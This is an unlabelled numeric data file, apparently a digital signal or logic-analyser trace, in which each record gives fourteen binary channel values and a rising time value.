0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2669100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669108e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669152e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669176e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669204e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669348e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669376e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669400e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669576e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669600e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669724e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669748e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669776e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669800e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669900e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669924e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2669948e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2669976e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670000e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670124e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670148e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670176e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670200e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670348e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670376e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670400e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670576e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670604e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670656e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670680e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2670708e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2670732e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2670736e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2795164e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2795364e-02 1,0,0,0,1,1,0,0,0,1,0,1,0,1,1.2795388e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2795412e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,1,1.2795724e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2795748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2795756e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2795772e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2795796e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2795824e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2795848e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2795876e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2795900e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2795924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2795948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2795972e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2795996e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796024e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796048e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796100e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796172e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796196e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796204e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2796252e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796276e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.2796280e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796284e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796348e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796372e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796396e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796420e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796428e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2796472e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796496e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796504e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796572e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796596e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796620e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796644e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796672e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796696e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796700e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2796724e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796748e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.2796752e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796756e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796772e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796796e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.2796800e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796804e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2796852e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796872e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2796896e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2796924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796928e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796948e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2796972e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2796996e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797020e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797048e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797072e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797076e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2797124e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797156e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797172e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797196e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797220e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797244e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797252e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2797296e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797324e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.2797328e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797332e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797348e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797372e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797396e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797420e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797444e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797472e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797496e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797548e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797572e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797596e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797620e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797648e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797672e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797676e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2797696e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797724e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2797748e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797772e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2797796e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797820e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797828e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797872e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2797896e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2797924e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.2797948e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2797952e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2797996e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2798024e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2798048e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2798076e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.2798080e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798084e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798096e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798172e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798196e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798224e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2798228e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2798276e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2798296e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798308e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798372e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798396e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798424e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798448e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798476e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798500e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798572e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798596e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798624e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798648e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798700e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798724e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798748e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798772e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798796e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798824e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798848e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2798852e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2798900e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2798924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798932e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798948e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2798972e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2798996e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799024e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799048e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2799076e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2799100e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2799124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799132e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799172e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799196e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799348e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799372e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2799380e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2799396e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2799424e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.2799428e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799432e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799448e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799524e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2799528e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2799572e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2799600e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799604e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799624e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799648e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799696e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799724e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799748e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799772e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799796e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799820e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799848e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799872e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799896e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2799972e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2799996e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800020e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800044e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800072e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800096e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800172e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800196e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2800200e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2800220e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2800244e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800252e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800296e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800372e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800396e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800420e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800444e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800496e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2800500e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2800524e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2800548e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.2800552e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800556e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800572e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800596e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.2800600e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2800604e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2800644e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2800672e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.2800676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800680e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800696e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800772e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800796e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800820e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800844e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800872e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2800876e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2800924e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2800948e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800956e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2800972e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2800996e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801020e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801044e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801072e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801096e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801172e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801196e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801220e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801244e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801272e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801296e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801372e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801396e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801420e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801444e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801472e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801496e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801572e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801596e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801620e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801644e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801668e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801692e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801748e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801768e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801796e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801820e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801844e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801868e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801892e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2801968e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2801996e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802020e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802044e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802068e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802168e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802196e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802220e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802244e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802268e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802372e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802396e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802420e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802444e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2802472e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2802496e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2802500e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2927068e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2927268e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,1.2927292e-02 0,1,0,0,1,1,0,0,0,1,0,1,0,1,1.2927320e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,1.2927344e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,1,1.2927644e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,1.2927668e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.2927676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,1.2927692e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.2927716e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,1.2927744e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.2927768e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,1.2927796e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.2927820e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,1.2927844e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.2927868e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,1.2927892e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2927900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2927916e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2927944e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2927968e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2927996e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928020e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928044e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928068e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928092e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928116e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2928124e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2928172e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2928196e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928204e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928220e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928244e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928268e-02 